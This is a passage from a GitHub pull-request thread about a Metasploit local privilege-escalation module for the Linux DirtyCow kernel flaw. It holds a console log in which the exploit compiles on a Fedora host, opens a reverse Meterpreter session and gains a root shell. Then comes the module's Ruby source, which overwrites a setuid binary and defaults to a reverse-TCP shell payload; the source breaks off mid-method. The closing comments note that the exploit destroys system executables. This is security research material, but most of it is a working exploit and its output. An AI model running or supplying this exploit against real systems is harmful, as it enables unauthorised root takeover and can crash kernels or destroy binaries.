[*] Writing '/tmp/.ojtGYrqeVV.c' (3354 bytes) ...
[-] Compiling failed:
/tmp/.ojtGYrqeVV.c: In function 'procselfmemThread':
/tmp/.ojtGYrqeVV.c:68:14: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [-Wint-conversion]
     lseek(f, map, SEEK_SET);
              ^
In file included from /tmp/.ojtGYrqeVV.c:8:0:
/usr/include/unistd.h:337:16: note: expected '__off_t {aka long int}' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
/tmp/.ojtGYrqeVV.c: In function 'main':
/tmp/.ojtGYrqeVV.c:98:3: warning: implicit declaration of function 'asprintf' [-Wimplicit-function-declaration]
   asprintf(&backup, "cp %s /tmp/.TuOARzxhSgA", suid_binary);
   ^
/tmp/.ojtGYrqeVV.c:102:3: warning: implicit declaration of function 'fstat' [-Wimplicit-function-declaration]
   fstat(f,&st);
   ^
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (861348 bytes) to 172.16.191.224
[*] Meterpreter session 39 opened (172.16.191.188:4444 -> 172.16.191.224:48768) at 2018-12-21 12:39:25 -0500

meterpreter > 
[*] Setting '/proc/sys/vm/dirty_writeback_centisecs' to '0'...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 23 (Linux 4.2.3-300.fc23.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 2239 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023
uname -a
Linux localhost.localdomain 4.2.3-300.fc23.x86_64 #1 SMP Mon Oct 5 15:42:54 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
```

---

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linux Kernel DirtyCow Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a race condition in the way the Linux kernel's
        memory subsystem handled the copy-on-write (COW) breakage of private
        read-only memory mappings. An unprivileged local user could use
        this flaw to gain write access to otherwise read-only memory mappings
        and thus increase their privileges on the system.

        The bug has existed since around Linux Kernel 2.6.22 (released in 2007).

        Note, failed exploitation attempts will likely crash the kernel.

        Successful explotiation will replace the specified setuid binary.

        This module has been tested successfully on:

        Fedora 23 Server kernel 4.2.3-300.fc23.x86_64 (X64)
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Phil Oester',  # Vulnerability discovery
        'Robin Verton', # cowroot.c exploit
        'Nixawk',       # Metasploit
        'bcoles',       # Metasploit
      ],
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'References'     =>
        [
          ['CVE', '2016-5195'],
          ['URL', 'https://dirtycow.ninja/'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/issues/25'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
          ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
        ],
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 }],
          [ 'Linux x64', { 'Arch' => ARCH_X64 }]
        ],
      'DefaultOptions' =>
        {
          'AppendExit'       => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid'  => true,
          'PrependSetuid'    => true,
          'PrependFork'      => true,
          'PAYLOAD'          => 'linux/x86/shell_reverse_tcp'
        },
      'DisclosureDate' => 'Oct 19 2016',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable', '/usr/bin/passwd'])
    ])
    register_advanced_options([
      OptString.new('WritableDir', [true, "A directory where we can write files (must not be mounted noexec)", '/tmp'])
    ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def suid_exe_path
    datastore['SUID_EXECUTABLE']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def strip_comments(c_code)
    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
  end

  def upload_and_compile(path, data, gcc_args='')
    upload "#{path}.c", data

    gcc_cmd = "gcc -o #{path} #{path}.c"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end

    unless gcc_args.to_s.blank?
      gcc_cmd << " #{gcc_args}"
    end

    output = cmd_exec gcc_cmd

    unless output.blank?
      # Uncomment this when the exploit code doesn't throw a bunch of warnings
      #fail_with Failure::Unknown, "#{path}.c failed to compile"
      # Until then:
      print_error 'Compiling failed:'
      print_line output
    end

    register_file_for_cleanup path
    chmod path
  end

  def check
    if selinux_installed?
      if selinux_enforcing?
        vprint_error 'SELinux is enforcing'
        return CheckCode::Safe
      end
      vprint_good 'SELinux is permissive'
    else
      vprint_good 'SELinux is not installed'
    end

    version = Gem::Version.new kernel_release.split('-').first

    if version.to_s.eql? ''
      vprint_error 'Coul [...]

2018-12-22 02:37 UTC, timwr commented
Nice work. Do you feel like opening a new pull request? I can help test and land

2018-12-22 06:53 UTC, bcoles commented
@timwr No thanks.

Vaporizing system executables with no option of recovery is lame and unacceptable.

The above exploit exists for anyone who wants to take the risk and knows how to copy/paste. This PR thread is also linked from the [Dirtycow PoCs page](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs) so people can find it.

2023-01-10 03:35 UTC, aruncs31s commented on modules/exploits/linux/local/dirtycow.rb
> +      'Description' => %q{
this is scary , our college library uses some modified version of ubuntu called koha i think it is using this old kernal